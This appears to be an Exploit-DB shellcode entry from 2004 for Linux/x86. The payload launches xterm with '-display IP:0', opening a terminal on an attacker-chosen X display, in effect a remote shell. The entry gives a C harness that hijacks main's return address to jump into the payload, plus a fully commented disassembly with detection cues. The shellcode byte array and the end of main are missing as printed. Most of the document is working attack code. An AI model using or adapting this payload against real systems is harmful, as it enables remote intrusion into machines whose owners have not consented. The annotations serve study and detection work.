linux/x86 - xterm -ut -display IP:0 132 bytes

ID EDB-ID:13440
Type exploitdb
Reporter RaiSe
Modified 2004-09-26T00:00:00


linux/x86 xterm -ut -display [IP]:0 132 bytes. Shellcode exploit for lin_x86 platform

 *  Linux/x86
 *  execve() of /usr/X11R6/bin/xterm -ut -display ip:0, exit()
 *  The address in the string is only an example; you must change it to an IP that is useful to you
 *  (perhaps with a subroutine inside the exploit?)
 *  - you must not delete the 'K' after ip:0 - (the code searches for it to terminate the address)
#include <stdio.h>

char shellcode[] =

main() {
        /* Shellcode test harness (K&R style, implicit int main).
         * ret is pointed at main's own saved return address on the
         * stack and that slot is overwritten with &shellcode, so the
         * ret at the end of main jumps into the payload.  "&ret+2"
         * assumes a 32-bit frame with ret at ebp-4 and no stack
         * protector; modern compilers reorder locals and insert a
         * canary, and an NX data segment faults on the jump anyway.
         * Note: strlen() is called but only <stdio.h> is included, and
         * the shellcode[] initializer and main's closing brace are not
         * present on this page. */
        int *ret;
        ret=(int *)&ret+2;                      /* saved EIP assumed two ints above ret */
        printf("Shellcode lenght=%d\n",strlen(shellcode));
        (*ret) = (int)shellcode;                /* return from main -> payload */

/* Code */
# Analyst notes (GAS/AT&T, 32-bit Linux, as printed by the disassembler:
# jump targets are relative displacements, not assemblable labels).
# Structure: jmp/call/pop to locate the trailing string, patch the '8'
# placeholders in it to NUL, scan for the 'K' sentinel that ends the
# address, build argv/envp in the bytes beyond the string (offsets
# 0x36..0x49 from its start, past its 47 bytes), then execve() and
# exit() via int $0x80.  It writes into its own body, so it only runs
# from memory that is both writable and executable; an NX / W^X
# mapping stops it.
# Detection cues: forward jmp / backward call / popl %esi GetPC idiom,
# int $0x80 with eax=11 (execve) followed by eax=1 (exit), and the
# xterm ... -display text carried in the payload.
jmp    0x4f                             # forward to the call at the end
popl   %esi                             # esi = address of the trailing .string
xorl   %edx,%edx                        # edx = 0
movb   %dl,0x14(%esi)                   # NUL over the '8' after ".../xterm"  -> ends argv[0]
movb   %dl,0x18(%esi)                   # NUL over the '8' after "-ut"        -> ends argv[1]
movb   %dl,0x21(%esi)                   # NUL over the '8' after "-display"   -> ends argv[2]
movb   $0x2b,%dl                        # edx = 0x2b: start scanning inside the address text
xorl   %ecx,%ecx
movb   $0x9,%cl                         # scan at most 9 bytes
cmpb   $0x4b,(%edx,%esi)                # byte at esi+edx == 'K' sentinel?
je     0x5                              # found: skip inc/loop/jmp to the store below
inc    %edx
loop   -0x9                             # back to the cmpb
jmp    0x2b                             # no 'K' within 9 bytes: skip execve, go to exit()
movb   %dh,(%edx,%esi)                  # dh still 0 (only dl was touched) -> NUL over 'K' ends argv[3]
xorl   %edx,%edx                        # edx = 0 (NULL)
movl   %esi,%ebx                        # ebx = filename "/usr/X11R6/bin/xterm"
movl   %esi,0x36(%esi)                  # argv[0] = filename; argv array lives at esi+0x36
leal   0x15(%esi),%edi                  # edi -> "-ut"
movl   %edi,0x3a(%esi)                  # argv[1]
leal   0x19(%esi),%edi                  # edi -> "-display"
movl   %edi,0x3e(%esi)                  # argv[2]
leal   0x22(%esi),%edi                  # edi -> "127.0.0.1:0"
movl   %edi,0x42(%esi)                  # argv[3]
movl   %edx,0x46(%esi)                  # argv[4] = NULL; the same slot doubles as the empty envp
leal   0x36(%esi),%ecx                  # ecx = argv
leal   0x46(%esi),%edx                  # edx = envp (points at the NULL just stored)
xorl   %eax,%eax
movb   $0xb,%eax                        # eax = 11 = execve (listed with %eax; presumably %al in the bytes)
int    $0x80                            # execve(ebx, ecx, edx)
xorl   %ebx,%ebx                        # reached only if execve failed or no 'K' was found
movl   %ebx,%eax
inc    %eax                             # eax = 1 = exit
int    $0x80                            # exit(0)
call   -0x54                            # back to popl %esi; pushes the address of the string below
.string \"/usr/X11R6/bin/xterm8-ut8-display8127.0.0.1:0K\"   # '8' = separator placeholders, 'K' = end-of-address sentinel

RaiSe <>

// [2004-09-26]